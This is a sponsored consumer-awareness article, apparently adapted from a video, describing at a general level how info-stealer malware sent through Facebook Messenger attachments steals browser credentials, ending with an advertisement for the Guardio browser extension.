Today, we're diving into how hackers infiltrate your Facebook and Instagram accounts using malware. We’ll explore how these attacks unfold, how your data is collected, and how a few clicks can compromise all your online accounts.
The Initial Attack
It often starts with a seemingly innocuous message, usually containing an attachment. A major red flag is an attachment, especially if it's a zip file. Zip files are compressed and harder to scan, particularly if they’re password-protected. The zip file may contain a simple script, such as a BAT or PowerShell script. While the script itself may not be malicious, it can reference malware hosted on platforms like GitHub or GitLab.
Execution and Data Theft
Despite its small size (e.g., 431 bytes), once executed, the script can perform various malicious actions rapidly. Initially, it may appear to do nothing more than display an error message and disappear. However, in the background, it can steal all saved credentials from your browsers and send them to a Telegram chat. This includes data such as IP addresses, cookies, login states, and saved passwords.
Understanding the Threat
You might think only highly skilled hackers can create such sophisticated malware. However, malware-as-a-service has made it possible for even novice attackers to deploy these threats. They can simply use a script to reference a pre-made malware library sold on the dark web, enabling them to steal credentials easily.
Dynamic Analysis of Malware
Using tools like triage, we can analyze how these scripts operate. Initially, they make network requests, gather computer information, delete themselves, drop startup files, execute EXE files, and read user profile data from web browsers. These actions often use legitimate system processes like cmd.exe, curl, and PowerShell, making them hard to detect.
Bots and Social Media
Bots are prevalent on social media platforms like Facebook and Twitter. While some spread misinformation, many are part of attacker botnets targeting business accounts. These bots send messages with info-stealer malware attachments. Even businesses with dedicated social media managers can fall victim, as happened with Linus Tech Tips.
Attack Flowchart
- Attackers send messages with malware links via Facebook Messenger.
- Recipients who execute the links receive the payload from platforms like GitHub or GitLab.
- The Python-based stealer runs, sending stolen credentials via Telegram or Discord.
- The success rate is approximately one in seventy, making it profitable for cybercriminals.
Guarding Against Attacks
Guardio, our sponsor, is a web extension that protects against online threats, including info stealers. It integrates with your browser to safeguard against scams and phishing links. Guardio also monitors your accounts for data breaches and has features like account protection for platforms such as Facebook, Instagram, LinkedIn, and X. This helps prevent info stealers from hijacking your accounts.
Conclusion
Sharing this information is crucial, especially with those who might not be tech-savvy. Understanding how these attacks work and taking preventive measures can protect against significant losses. If you found this information helpful, please share it. Stay informed, stay secure.
No comments